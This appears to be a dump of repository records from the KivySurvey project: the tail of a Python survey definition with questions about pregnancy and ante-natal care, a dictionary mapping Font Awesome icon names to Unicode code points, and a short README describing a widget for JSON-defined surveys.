{\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"Have you ever been pregnant?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'ever_pregnant'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t\"ante-natal_care\": \n\t\t\t\t\t{\"type\": \"SurveyQuestionYesNo\", \n\t\t\t\t\t\"args\": {\n\t\t\t\t\t\t\"question_text\": \n\t\t\t\t\t\t\t\"When you were pregnant, did you receive any ante-natal care?\",\n\t\t\t\t\t\t\"allow_no_answer\": True,\n\t\t\t\t\t\t\"answer_group\": 'ante-natal'\n\t\t\t\t\t\t}\n\t\t\t\t\t},\n\t\t\t\t},\n\t\t\t\t\"question_order\": ['ever_pregnant', 'ante-natal_care']\n\t\t\t},},\n\t\t\"page_order\": [\"women_survey1\", \"women_survey2\"],\n\t\t\"add_subjects\": False,\n\t\t\"allow_forward\": True,\n\t\t\"demographic_restrictions\": [('add_member', \n\t\t\t'addmember1', 'age', (15, 49)), ('add_member', \n\t\t\t'addmember1', 'gender', 'F')],\n\t\t\"demographic\": 'add_member',\n\t\t\"headers\": [('Women Survey for Household', \n\t\t\t('household_questionnaire', 'household1', 'household_id'))],\n\t\t\"subject_fields\": [('add_member', 'addmember1', 'name'), \n\t\t\t('add_member', 'addmember1', 'age'),\n\t\t\t('add_member', 'addmember1', 'gender')]\n\t\t},\n\t\n}\n\njson = JsonStore('survey.json')\njson['survey'] = survey" }, { "alpha_fraction": 0.5139415860176086, "alphanum_fraction": 0.6013830304145813, "avg_line_length": 25.633663177490234, "blob_id": "b627909688622b2a2c3c1c63a9beac4c8b7b458f", "content_id": "3087be55bc86046f26b33023a78c2c7971a4b455", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13449, "license_type": "permissive", "max_line_length": 37, "num_lines": 505, "path": "/kivy_survey/fa_icon_definitions.py", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "fa_icons = {\n'fa-glass': u\"\\uf000\",\n'fa-music': u\"\\uf001\",\n'fa-search': u\"\\uf002\",\n'fa-envelope-o': u\"\\uf003\",\n'fa-heart': u\"\\uf004\",\n'fa-star': u\"\\uf005\",\n'fa-star-o': u\"\\uf006\",\n'fa-user': u\"\\uf007\",\n'fa-film': u\"\\uf008\",\n'fa-th-large': u\"\\uf009\",\n'fa-th': u\"\\uf00a\",\n'fa-th-list': 
u\"\\uf00b\",\n'fa-check': u\"\\uf00c\",\n'fa-times': u\"\\uf00d\",\n'fa-search-plus': u\"\\uf00e\",\n'fa-search-minus': u\"\\uf010\",\n'fa-power-off': u\"\\uf011\",\n'fa-signal': u\"\\uf012\",\n'fa-gear': u\"\\uf013\",\n'fa-cog': u\"\\uf013\",\n'fa-trash-o': u\"\\uf014\",\n'fa-home': u\"\\uf015\",\n'fa-file-o': u\"\\uf016\",\n'fa-clock-o': u\"\\uf017\",\n'fa-road': u\"\\uf018\",\n'fa-download': u\"\\uf019\",\n'fa-arrow-circle-o-down': u\"\\uf01a\",\n'fa-arrow-circle-o-up': u\"\\uf01b\",\n'fa-inbox': u\"\\uf01c\",\n'fa-play-circle-o': u\"\\uf01d\",\n'fa-rotate-right': u\"\\uf01e\",\n'fa-repeat': u\"\\uf01e\",\n'fa-refresh': u\"\\uf021\",\n'fa-list-alt': u\"\\uf022\",\n'fa-lock': u\"\\uf023\",\n'fa-flag': u\"\\uf024\",\n'fa-headphones': u\"\\uf025\",\n'fa-volume-off': u\"\\uf026\",\n'fa-volume-down': u\"\\uf027\",\n'fa-volume-up': u\"\\uf028\",\n'fa-qrcode': u\"\\uf029\",\n'fa-barcode': u\"\\uf02a\",\n'fa-tag': u\"\\uf02b\",\n'fa-tags': u\"\\uf02c\",\n'fa-book': u\"\\uf02d\",\n'fa-bookmark': u\"\\uf02e\",\n'fa-print': u\"\\uf02f\",\n'fa-camera': u\"\\uf030\",\n'fa-font': u\"\\uf031\",\n'fa-bold': u\"\\uf032\",\n'fa-italic': u\"\\uf033\",\n'fa-text-height': u\"\\uf034\",\n'fa-text-width': u\"\\uf035\",\n'fa-align-left': u\"\\uf036\",\n'fa-align-center': u\"\\uf037\",\n'fa-align-right': u\"\\uf038\",\n'fa-align-justify': u\"\\uf039\",\n'fa-list': u\"\\uf03a\",\n'fa-dedent': u\"\\uf03b\",\n'fa-outdent': u\"\\uf03b\",\n'fa-indent': u\"\\uf03c\",\n'fa-video-camera': u\"\\uf03d\",\n'fa-photo': u\"\\uf03e\",\n'fa-image': u\"\\uf03e\",\n'fa-picture-o': u\"\\uf03e\",\n'fa-pencil': u\"\\uf040\",\n'fa-map-marker': u\"\\uf041\",\n'fa-adjust': u\"\\uf042\",\n'fa-tint': u\"\\uf043\",\n'fa-edit': u\"\\uf044\",\n'fa-pencil-square-o': u\"\\uf044\",\n'fa-share-square-o': u\"\\uf045\",\n'fa-check-square-o': u\"\\uf046\",\n'fa-arrows': u\"\\uf047\",\n'fa-step-backward': u\"\\uf048\",\n'fa-fast-backward': u\"\\uf049\",\n'fa-backward': u\"\\uf04a\",\n'fa-play': u\"\\uf04b\",\n'fa-pause': u\"\\uf04c\",\n'fa-stop': u\"\\uf04d\",\n'fa-forward': u\"\\uf04e\",\n'fa-fast-forward': u\"\\uf050\",\n'fa-step-forward': u\"\\uf051\",\n'fa-eject': u\"\\uf052\",\n'fa-chevron-left': u\"\\uf053\",\n'fa-chevron-right': u\"\\uf054\",\n'fa-plus-circle': u\"\\uf055\",\n'fa-minus-circle': u\"\\uf056\",\n'fa-times-circle': u\"\\uf057\",\n'fa-check-circle': u\"\\uf058\",\n'fa-question-circle': u\"\\uf059\",\n'fa-info-circle': u\"\\uf05a\",\n'fa-crosshairs': u\"\\uf05b\",\n'fa-times-circle-o': u\"\\uf05c\",\n'fa-check-circle-o': u\"\\uf05d\",\n'fa-ban': u\"\\uf05e\",\n'fa-arrow-left': u\"\\uf060\",\n'fa-arrow-right': u\"\\uf061\",\n'fa-arrow-up': u\"\\uf062\",\n'fa-arrow-down': u\"\\uf063\",\n'fa-mail-forward': u\"\\uf064\",\n'fa-share': u\"\\uf064\",\n'fa-expand': u\"\\uf065\",\n'fa-compress': u\"\\uf066\",\n'fa-plus': u\"\\uf067\",\n'fa-minus': u\"\\uf068\",\n'fa-asterisk': u\"\\uf069\",\n'fa-exclamation-circle': u\"\\uf06a\",\n'fa-gift': u\"\\uf06b\",\n'fa-leaf': u\"\\uf06c\",\n'fa-fire': u\"\\uf06d\",\n'fa-eye': u\"\\uf06e\",\n'fa-eye-slash': u\"\\uf070\",\n'fa-warning': u\"\\uf071\",\n'fa-exclamation-triangle': u\"\\uf071\",\n'fa-plane': u\"\\uf072\",\n'fa-calendar': u\"\\uf073\",\n'fa-random': u\"\\uf074\",\n'fa-comment': u\"\\uf075\",\n'fa-magnet': u\"\\uf076\",\n'fa-chevron-up': u\"\\uf077\",\n'fa-chevron-down': u\"\\uf078\",\n'fa-retweet': u\"\\uf079\",\n'fa-shopping-cart': u\"\\uf07a\",\n'fa-folder': u\"\\uf07b\",\n'fa-folder-open': u\"\\uf07c\",\n'fa-arrows-v': u\"\\uf07d\",\n'fa-arrows-h': u\"\\uf07e\",\n'fa-bar-chart-o': 
u\"\\uf080\",\n'fa-twitter-square': u\"\\uf081\",\n'fa-facebook-square': u\"\\uf082\",\n'fa-camera-retro': u\"\\uf083\",\n'fa-key': u\"\\uf084\",\n'fa-gears': u\"\\uf085\",\n'fa-cogs': u\"\\uf085\",\n'fa-comments': u\"\\uf086\",\n'fa-thumbs-o-up': u\"\\uf087\",\n'fa-thumbs-o-down': u\"\\uf088\",\n'fa-star-half': u\"\\uf089\",\n'fa-heart-o': u\"\\uf08a\",\n'fa-sign-out': u\"\\uf08b\",\n'fa-linkedin-square': u\"\\uf08c\",\n'fa-thumb-tack': u\"\\uf08d\",\n'fa-external-link': u\"\\uf08e\",\n'fa-sign-in': u\"\\uf090\",\n'fa-trophy': u\"\\uf091\",\n'fa-github-square': u\"\\uf092\",\n'fa-upload': u\"\\uf093\",\n'fa-lemon-o': u\"\\uf094\",\n'fa-phone': u\"\\uf095\",\n'fa-square-o': u\"\\uf096\",\n'fa-bookmark-o': u\"\\uf097\",\n'fa-phone-square': u\"\\uf098\",\n'fa-twitter': u\"\\uf099\",\n'fa-facebook': u\"\\uf09a\",\n'fa-github': u\"\\uf09b\",\n'fa-unlock': u\"\\uf09c\",\n'fa-credit-card': u\"\\uf09d\",\n'fa-rss': u\"\\uf09e\",\n'fa-hdd-o': u\"\\uf0a0\",\n'fa-bullhorn': u\"\\uf0a1\",\n'fa-bell': u\"\\uf0f3\",\n'fa-certificate': u\"\\uf0a3\",\n'fa-hand-o-right': u\"\\uf0a4\",\n'fa-hand-o-left': u\"\\uf0a5\",\n'fa-hand-o-up': u\"\\uf0a6\",\n'fa-hand-o-down': u\"\\uf0a7\",\n'fa-arrow-circle-left': u\"\\uf0a8\",\n'fa-arrow-circle-right': u\"\\uf0a9\",\n'fa-arrow-circle-up': u\"\\uf0aa\",\n'fa-arrow-circle-down': u\"\\uf0ab\",\n'fa-globe': u\"\\uf0ac\",\n'fa-wrench': u\"\\uf0ad\",\n'fa-tasks': u\"\\uf0ae\",\n'fa-filter': u\"\\uf0b0\",\n'fa-briefcase': u\"\\uf0b1\",\n'fa-arrows-alt': u\"\\uf0b2\",\n'fa-group': u\"\\uf0c0\",\n'fa-users': u\"\\uf0c0\",\n'fa-chain': u\"\\uf0c1\",\n'fa-link': u\"\\uf0c1\",\n'fa-cloud': u\"\\uf0c2\",\n'fa-flask': u\"\\uf0c3\",\n'fa-cut': u\"\\uf0c4\",\n'fa-scissors': u\"\\uf0c4\",\n'fa-copy': u\"\\uf0c5\",\n'fa-files-o': u\"\\uf0c5\",\n'fa-paperclip': u\"\\uf0c6\",\n'fa-save': u\"\\uf0c7\",\n'fa-floppy-o': u\"\\uf0c7\",\n'fa-square': u\"\\uf0c8\",\n'fa-navicon': u\"\\uf0c9\",\n'fa-reorder': u\"\\uf0c9\",\n'fa-bars': u\"\\uf0c9\",\n'fa-list-ul': u\"\\uf0ca\",\n'fa-list-ol': u\"\\uf0cb\",\n'fa-strikethrough': u\"\\uf0cc\",\n'fa-underline': u\"\\uf0cd\",\n'fa-table': u\"\\uf0ce\",\n'fa-magic': u\"\\uf0d0\",\n'fa-truck': u\"\\uf0d1\",\n'fa-pinterest': u\"\\uf0d2\",\n'fa-pinterest-square': u\"\\uf0d3\",\n'fa-google-plus-square': u\"\\uf0d4\",\n'fa-google-plus': u\"\\uf0d5\",\n'fa-money': u\"\\uf0d6\",\n'fa-caret-down': u\"\\uf0d7\",\n'fa-caret-up': u\"\\uf0d8\",\n'fa-caret-left': u\"\\uf0d9\",\n'fa-caret-right': u\"\\uf0da\",\n'fa-columns': u\"\\uf0db\",\n'fa-unsorted': u\"\\uf0dc\",\n'fa-sort': u\"\\uf0dc\",\n'fa-sort-down': u\"\\uf0dd\",\n'fa-sort-desc': u\"\\uf0dd\",\n'fa-sort-up': u\"\\uf0de\",\n'fa-sort-asc': u\"\\uf0de\",\n'fa-envelope': u\"\\uf0e0\",\n'fa-linkedin': u\"\\uf0e1\",\n'fa-rotate-left': u\"\\uf0e2\",\n'fa-undo': u\"\\uf0e2\",\n'fa-legal': u\"\\uf0e3\",\n'fa-gavel': u\"\\uf0e3\",\n'fa-dashboard': u\"\\uf0e4\",\n'fa-tachometer': u\"\\uf0e4\",\n'fa-comment-o': u\"\\uf0e5\",\n'fa-comments-o': u\"\\uf0e6\",\n'fa-flash': u\"\\uf0e7\",\n'fa-bolt': u\"\\uf0e7\",\n'fa-sitemap': u\"\\uf0e8\",\n'fa-umbrella': u\"\\uf0e9\",\n'fa-paste': u\"\\uf0ea\",\n'fa-clipboard': u\"\\uf0ea\",\n'fa-lightbulb-o': u\"\\uf0eb\",\n'fa-exchange': u\"\\uf0ec\",\n'fa-cloud-download': u\"\\uf0ed\",\n'fa-cloud-upload': u\"\\uf0ee\",\n'fa-user-md': u\"\\uf0f0\",\n'fa-stethoscope': u\"\\uf0f1\",\n'fa-suitcase': u\"\\uf0f2\",\n'fa-bell-o': u\"\\uf0a2\",\n'fa-coffee': u\"\\uf0f4\",\n'fa-cutlery': u\"\\uf0f5\",\n'fa-file-text-o': u\"\\uf0f6\",\n'fa-building-o': u\"\\uf0f7\",\n'fa-hospital-o': 
u\"\\uf0f8\",\n'fa-ambulance': u\"\\uf0f9\",\n'fa-medkit': u\"\\uf0fa\",\n'fa-fighter-jet': u\"\\uf0fb\",\n'fa-beer': u\"\\uf0fc\",\n'fa-h-square': u\"\\uf0fd\",\n'fa-plus-square': u\"\\uf0fe\",\n'fa-angle-double-left': u\"\\uf100\",\n'fa-angle-double-right': u\"\\uf101\",\n'fa-angle-double-up': u\"\\uf102\",\n'fa-angle-double-down': u\"\\uf103\",\n'fa-angle-left': u\"\\uf104\",\n'fa-angle-right': u\"\\uf105\",\n'fa-angle-up': u\"\\uf106\",\n'fa-angle-down': u\"\\uf107\",\n'fa-desktop': u\"\\uf108\",\n'fa-laptop': u\"\\uf109\",\n'fa-tablet': u\"\\uf10a\",\n'fa-mobile-phone': u\"\\uf10b\",\n'fa-mobile': u\"\\uf10b\",\n'fa-circle-o': u\"\\uf10c\",\n'fa-quote-left': u\"\\uf10d\",\n'fa-quote-right': u\"\\uf10e\",\n'fa-spinner': u\"\\uf110\",\n'fa-circle': u\"\\uf111\",\n'fa-mail-reply': u\"\\uf112\",\n'fa-reply': u\"\\uf112\",\n'fa-github-alt': u\"\\uf113\",\n'fa-folder-o': u\"\\uf114\",\n'fa-folder-open-o': u\"\\uf115\",\n'fa-smile-o': u\"\\uf118\",\n'fa-frown-o': u\"\\uf119\",\n'fa-meh-o': u\"\\uf11a\",\n'fa-gamepad': u\"\\uf11b\",\n'fa-keyboard-o': u\"\\uf11c\",\n'fa-flag-o': u\"\\uf11d\",\n'fa-flag-checkered': u\"\\uf11e\",\n'fa-terminal': u\"\\uf120\",\n'fa-code': u\"\\uf121\",\n'fa-mail-reply-all': u\"\\uf122\",\n'fa-reply-all': u\"\\uf122\",\n'fa-star-half-empty': u\"\\uf123\",\n'fa-star-half-full': u\"\\uf123\",\n'fa-star-half-o': u\"\\uf123\",\n'fa-location-arrow': u\"\\uf124\",\n'fa-crop': u\"\\uf125\",\n'fa-code-fork': u\"\\uf126\",\n'fa-unlink': u\"\\uf127\",\n'fa-chain-broken': u\"\\uf127\",\n'fa-question': u\"\\uf128\",\n'fa-info': u\"\\uf129\",\n'fa-exclamation': u\"\\uf12a\",\n'fa-superscript': u\"\\uf12b\",\n'fa-subscript': u\"\\uf12c\",\n'fa-eraser': u\"\\uf12d\",\n'fa-puzzle-piece': u\"\\uf12e\",\n'fa-microphone': u\"\\uf130\",\n'fa-microphone-slash': u\"\\uf131\",\n'fa-shield': u\"\\uf132\",\n'fa-calendar-o': u\"\\uf133\",\n'fa-fire-extinguisher': u\"\\uf134\",\n'fa-rocket': u\"\\uf135\",\n'fa-maxcdn': u\"\\uf136\",\n'fa-chevron-circle-left': u\"\\uf137\",\n'fa-chevron-circle-right': u\"\\uf138\",\n'fa-chevron-circle-up': u\"\\uf139\",\n'fa-chevron-circle-down': u\"\\uf13a\",\n'fa-html5': u\"\\uf13b\",\n'fa-css3': u\"\\uf13c\",\n'fa-anchor': u\"\\uf13d\",\n'fa-unlock-alt': u\"\\uf13e\",\n'fa-bullseye': u\"\\uf140\",\n'fa-ellipsis-h': u\"\\uf141\",\n'fa-ellipsis-v': u\"\\uf142\",\n'fa-rss-square': u\"\\uf143\",\n'fa-play-circle': u\"\\uf144\",\n'fa-ticket': u\"\\uf145\",\n'fa-minus-square': u\"\\uf146\",\n'fa-minus-square-o': u\"\\uf147\",\n'fa-level-up': u\"\\uf148\",\n'fa-level-down': u\"\\uf149\",\n'fa-check-square': u\"\\uf14a\",\n'fa-pencil-square': u\"\\uf14b\",\n'fa-external-link-square': u\"\\uf14c\",\n'fa-share-square': u\"\\uf14d\",\n'fa-compass': u\"\\uf14e\",\n'fa-toggle-down': u\"\\uf150\",\n'fa-caret-square-o-down': u\"\\uf150\",\n'fa-toggle-up': u\"\\uf151\",\n'fa-caret-square-o-up': u\"\\uf151\",\n'fa-toggle-right': u\"\\uf152\",\n'fa-caret-square-o-right': u\"\\uf152\",\n'fa-euro': u\"\\uf153\",\n'fa-eur': u\"\\uf153\",\n'fa-gbp': u\"\\uf154\",\n'fa-dollar': u\"\\uf155\",\n'fa-usd': u\"\\uf155\",\n'fa-rupee': u\"\\uf156\",\n'fa-inr': u\"\\uf156\",\n'fa-cny': u\"\\uf157\",\n'fa-rmb': u\"\\uf157\",\n'fa-yen': u\"\\uf157\",\n'fa-jpy': u\"\\uf157\",\n'fa-ruble': u\"\\uf158\",\n'fa-rouble': u\"\\uf158\",\n'fa-rub': u\"\\uf158\",\n'fa-won': u\"\\uf159\",\n'fa-krw': u\"\\uf159\",\n'fa-bitcoin': u\"\\uf15a\",\n'fa-btc': u\"\\uf15a\",\n'fa-file': u\"\\uf15b\",\n'fa-file-text': u\"\\uf15c\",\n'fa-sort-alpha-asc': u\"\\uf15d\",\n'fa-sort-alpha-desc': 
u\"\\uf15e\",\n'fa-sort-amount-asc': u\"\\uf160\",\n'fa-sort-amount-desc': u\"\\uf161\",\n'fa-sort-numeric-asc': u\"\\uf162\",\n'fa-sort-numeric-desc': u\"\\uf163\",\n'fa-thumbs-up': u\"\\uf164\",\n'fa-thumbs-down': u\"\\uf165\",\n'fa-youtube-square': u\"\\uf166\",\n'fa-youtube': u\"\\uf167\",\n'fa-xing': u\"\\uf168\",\n'fa-xing-square': u\"\\uf169\",\n'fa-youtube-play': u\"\\uf16a\",\n'fa-dropbox': u\"\\uf16b\",\n'fa-stack-overflow': u\"\\uf16c\",\n'fa-instagram': u\"\\uf16d\",\n'fa-flickr': u\"\\uf16e\",\n'fa-adn': u\"\\uf170\",\n'fa-bitbucket': u\"\\uf171\",\n'fa-bitbucket-square': u\"\\uf172\",\n'fa-tumblr': u\"\\uf173\",\n'fa-tumblr-square': u\"\\uf174\",\n'fa-long-arrow-down': u\"\\uf175\",\n'fa-long-arrow-up': u\"\\uf176\",\n'fa-long-arrow-left': u\"\\uf177\",\n'fa-long-arrow-right': u\"\\uf178\",\n'fa-apple': u\"\\uf179\",\n'fa-windows': u\"\\uf17a\",\n'fa-android': u\"\\uf17b\",\n'fa-linux': u\"\\uf17c\",\n'fa-dribbble': u\"\\uf17d\",\n'fa-skype': u\"\\uf17e\",\n'fa-foursquare': u\"\\uf180\",\n'fa-trello': u\"\\uf181\",\n'fa-female': u\"\\uf182\",\n'fa-male': u\"\\uf183\",\n'fa-gittip': u\"\\uf184\",\n'fa-sun-o': u\"\\uf185\",\n'fa-moon-o': u\"\\uf186\",\n'fa-archive': u\"\\uf187\",\n'fa-bug': u\"\\uf188\",\n'fa-vk': u\"\\uf189\",\n'fa-weibo': u\"\\uf18a\",\n'fa-renren': u\"\\uf18b\",\n'fa-pagelines': u\"\\uf18c\",\n'fa-stack-exchange': u\"\\uf18d\",\n'fa-arrow-circle-o-right': u\"\\uf18e\",\n'fa-arrow-circle-o-left': u\"\\uf190\",\n'fa-toggle-left': u\"\\uf191\",\n'fa-caret-square-o-left': u\"\\uf191\",\n'fa-dot-circle-o': u\"\\uf192\",\n'fa-wheelchair': u\"\\uf193\",\n'fa-vimeo-square': u\"\\uf194\",\n'fa-turkish-lira': u\"\\uf195\",\n'fa-try': u\"\\uf195\",\n'fa-plus-square-o': u\"\\uf196\",\n'fa-space-shuttle': u\"\\uf197\",\n'fa-slack': u\"\\uf198\",\n'fa-envelope-square': u\"\\uf199\",\n'fa-wordpress': u\"\\uf19a\",\n'fa-openid': u\"\\uf19b\",\n'fa-institution': u\"\\uf19c\",\n'fa-bank': u\"\\uf19c\",\n'fa-university': u\"\\uf19c\",\n'fa-mortar-board': u\"\\uf19d\",\n'fa-graduation-cap': u\"\\uf19d\",\n'fa-yahoo': u\"\\uf19e\",\n'fa-google': u\"\\uf1a0\",\n'fa-reddit': u\"\\uf1a1\",\n'fa-reddit-square': u\"\\uf1a2\",\n'fa-stumbleupon-circle': u\"\\uf1a3\",\n'fa-stumbleupon': u\"\\uf1a4\",\n'fa-delicious': u\"\\uf1a5\",\n'fa-digg': u\"\\uf1a6\",\n'fa-pied-piper-square': u\"\\uf1a7\",\n'fa-pied-piper': u\"\\uf1a7\",\n'fa-pied-piper-alt': u\"\\uf1a8\",\n'fa-drupal': u\"\\uf1a9\",\n'fa-joomla': u\"\\uf1aa\",\n'fa-language': u\"\\uf1ab\",\n'fa-fax': u\"\\uf1ac\",\n'fa-building': u\"\\uf1ad\",\n'fa-child': u\"\\uf1ae\",\n'fa-paw': u\"\\uf1b0\",\n'fa-spoon': u\"\\uf1b1\",\n'fa-cube': u\"\\uf1b2\",\n'fa-cubes': u\"\\uf1b3\",\n'fa-behance': u\"\\uf1b4\",\n'fa-behance-square': u\"\\uf1b5\",\n'fa-steam': u\"\\uf1b6\",\n'fa-steam-square': u\"\\uf1b7\",\n'fa-recycle': u\"\\uf1b8\",\n'fa-automobile': u\"\\uf1b9\",\n'fa-car': u\"\\uf1b9\",\n'fa-cab': u\"\\uf1ba\",\n'fa-taxi': u\"\\uf1ba\",\n'fa-tree': u\"\\uf1bb\",\n'fa-spotify': u\"\\uf1bc\",\n'fa-deviantart': u\"\\uf1bd\",\n'fa-soundcloud': u\"\\uf1be\",\n'fa-database': u\"\\uf1c0\",\n'fa-file-pdf-o': u\"\\uf1c1\",\n'fa-file-word-o': u\"\\uf1c2\",\n'fa-file-excel-o': u\"\\uf1c3\",\n'fa-file-powerpoint-o': u\"\\uf1c4\",\n'fa-file-photo-o': u\"\\uf1c5\",\n'fa-file-picture-o': u\"\\uf1c5\",\n'fa-file-image-o': u\"\\uf1c5\",\n'fa-file-zip-o': u\"\\uf1c6\",\n'fa-file-archive-o': u\"\\uf1c6\",\n'fa-file-sound-o': u\"\\uf1c7\",\n'fa-file-audio-o': u\"\\uf1c7\",\n'fa-file-movie-o': u\"\\uf1c8\",\n'fa-file-video-o': 
u\"\\uf1c8\",\n'fa-file-code-o': u\"\\uf1c9\",\n'fa-vine': u\"\\uf1ca\",\n'fa-codepen': u\"\\uf1cb\",\n'fa-jsfiddle': u\"\\uf1cc\",\n'fa-life-bouy': u\"\\uf1cd\",\n'fa-life-saver': u\"\\uf1cd\",\n'fa-support': u\"\\uf1cd\",\n'fa-life-ring': u\"\\uf1cd\",\n'fa-circle-o-notch': u\"\\uf1ce\",\n'fa-ra': u\"\\uf1d0\",\n'fa-rebel': u\"\\uf1d0\",\n'fa-ge': u\"\\uf1d1\",\n'fa-empire': u\"\\uf1d1\",\n'fa-git-square': u\"\\uf1d2\",\n'fa-git': u\"\\uf1d3\",\n'fa-hacker-news': u\"\\uf1d4\",\n'fa-tencent-weibo': u\"\\uf1d5\",\n'fa-qq': u\"\\uf1d6\",\n'fa-wechat': u\"\\uf1d7\",\n'fa-weixin': u\"\\uf1d7\",\n'fa-send': u\"\\uf1d8\",\n'fa-paper-plane': u\"\\uf1d8\",\n'fa-send-o': u\"\\uf1d9\",\n'fa-paper-plane-o': u\"\\uf1d9\",\n'fa-history': u\"\\uf1da\",\n'fa-circle-thin': u\"\\uf1db\",\n'fa-header': u\"\\uf1dc\",\n'fa-paragraph': u\"\\uf1dd\",\n'fa-sliders': u\"\\uf1de\",\n'fa-share-alt': u\"\\uf1e0\",\n'fa-share-alt-square': u\"\\uf1e1\",\n'fa-bomb': u\"\\uf1e2\",\n}" }, { "alpha_fraction": 0.752212405204773, "alphanum_fraction": 0.752212405204773, "avg_line_length": 27.25, "blob_id": "cd0d9148f9d0d258e32f3cf18b72801987e39b9f", "content_id": "9de77e0e9b7f0d1fa9313d87d24808923e969b61", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 113, "license_type": "permissive", "max_line_length": 89, "num_lines": 4, "path": "/README.md", "repo_name": "chrmorais/KivySurvey", "src_encoding": "UTF-8", "text": "KivySurvey\n==========\n\nThe KivySurvey widget allows you to embed surveys defined via json into your application.\n" } ]
8
sandip5004/jumia-dashboard
https://github.com/sandip5004/jumia-dashboard
7d7bafbf85a07e1eb67fee66464fa1b9e0216315
9c1093385fb233122ed0b6fed296310c7a8a8173
9825dedd441013f4e8df8efd4c3126a2349dc952
refs/heads/master
2020-07-28T10:39:12.020083
2019-09-26T12:32:49
2019-09-26T12:32:49
209,395,900
0
1
null
null
null
null
null
[ { "alpha_fraction": 0.6086747050285339, "alphanum_fraction": 0.6163855195045471, "avg_line_length": 28.239437103271484, "blob_id": "db1fa64b20a37ae0dae536c115ed244dfea535e9", "content_id": "35c2a2f6c0031654b1dc3918990216e971a40737", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2075, "license_type": "no_license", "max_line_length": 87, "num_lines": 71, "path": "/app.py", "repo_name": "sandip5004/jumia-dashboard", "src_encoding": "UTF-8", "text": "from flask import Flask, render_template\nfrom flask_login import LoginManager\nfrom flask import session, redirect, g, request\nfrom functools import wraps\nimport json\n\napp = Flask(__name__)\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\napp.secret_key = \"jumiabot\"\n\ndef web_login_required(f):\n    @wraps(f)\n    def decorated_function(*args, **kwargs):\n        session_login = session.get('session_login', None)\n        if not session_login:\n            return redirect('/login', 302)\n        return f(*args, **kwargs)\n    return decorated_function\ndef file_put_contents(file_name,contents='',mode='w'):\n    try:\n        with open(file_name, mode) as f:\n            f.write(contents)\n        return True\n    except:\n        return False\n\ndef file_get_contents(file_name):\n    try:\n        with open(file_name) as file:\n            data = file.read()\n        return data.strip()\n    except:\n        return False\n\[email protected](\"/\")\n@web_login_required\ndef index():\n    products = json.loads(file_get_contents('./products.json'))\n    bot_results = {}\n    return render_template('dashboard.html',products=products, bot_results=bot_results)\n\[email protected](\"/logout\")\n@web_login_required\ndef logout():\n    session_login = session.get('session_login', None)\n    if session_login:\n        session.pop('session_login')\n    return redirect('/login', 302)\n\[email protected](\"/login\", methods=['GET', 'POST'])\ndef login():\n    context={}\n    if request.method == 'POST':\n        email = request.form.get('email',None)\n        password = request.form.get('password',None)\n        if email == '[email protected]' and password == 'Yacine123':\n            session.permanent = True\n            session['session_login'] = \"user\"\n            return redirect('/', 302)\n        else:\n            context = {\"error\":\"Email or password does not match\"}\n    else:\n        session_login = session.get('session_login', None)\n        if session_login:\n            return redirect('/', 302)\n    return render_template('login.html',**context)\n\n\nif __name__ == '__main__':\n    app.run(debug=True, port=8001)" } ]
1
josejohn13/csp-exercises
https://github.com/josejohn13/csp-exercises
aa184272e9fef5ff4f9ed0d4e74f652a962b5587
d4aa54408a9f4d5ca52ee690e4af10094767f819
5f7a8e5c5a11aff14409ef511e3c440f0e4bfb9d
refs/heads/master
2020-12-06T23:58:52.906551
2020-01-16T08:13:48
2020-01-16T08:13:48
232,587,243
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6821191906929016, "alphanum_fraction": 0.7417218685150146, "avg_line_length": 29.399999618530273, "blob_id": "ea44352a430a9a262d77ba977c5ac870253ffe78", "content_id": "e220a0bf33ce28b706d4e8cb8cc78f40da0bc5bf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 151, "license_type": "no_license", "max_line_length": 51, "num_lines": 5, "path": "/20200108/CLIENT1.py", "repo_name": "josejohn13/csp-exercises", "src_encoding": "UTF-8", "text": "import socket\ns=socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect ((socket.gethostname(), 1024))\nmsg=s.recv(1024)\nprint(msg.decode (\"utf-8\"))" } ]
1
aj-git02/COL100-assignments
https://github.com/aj-git02/COL100-assignments
9dc3445e1e265fba5ad5a2559a8195f88f8a30ea
a5419b1d876e7f45c003cf15ad9f3e3abe7c7bfb
87c0a67816ed0738f292d20b70add8682efd4abc
refs/heads/main
2023-06-15T20:11:12.209804
2021-07-15T14:37:11
2021-07-15T14:37:11
386,288,265
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7818182110786438, "alphanum_fraction": 0.8363636136054993, "avg_line_length": 26.5, "blob_id": "8199bd78bc5e30968757596acd0c0abe121d5d6a", "content_id": "479273a7b2a432a0a6fd887df99da40a263ae229", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 55, "license_type": "no_license", "max_line_length": 40, "num_lines": 2, "path": "/README.md", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "# COL100-assignments and their solutions\nfor posterity\n" }, { "alpha_fraction": 0.5657752752304077, "alphanum_fraction": 0.5781755447387695, "avg_line_length": 35.94023895263672, "blob_id": "0721be7178667a6cb0dcb7ca5b0f47eb170c5927", "content_id": "8b8a9e17fa7f78e8b1bfc36d43ee0ec92606810b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9274, "license_type": "no_license", "max_line_length": 209, "num_lines": 251, "path": "/assg 4 submitted.py", "repo_name": "aj-git02/COL100-assignments", "src_encoding": "UTF-8", "text": "#problem 1\r\n\r\n#the function isint(x) checks whether the string x is an integer digit or a decimal point\r\ndef isint(x):\r\n    for i in range(0,10):\r\n        #assert: x is a string with a single element\r\n        #invariant: the string does not contain integers from 0 to i-1\r\n        #note here instead of str function individual cases of '1','2' etc. could also have been made\r\n        if x==str(i):\r\n            #assert: string has an integer\r\n            return True\r\n    #assert:string does not have an integer\r\n    if x=='.':\r\n        #assert: string has a decimal\r\n        return True\r\n    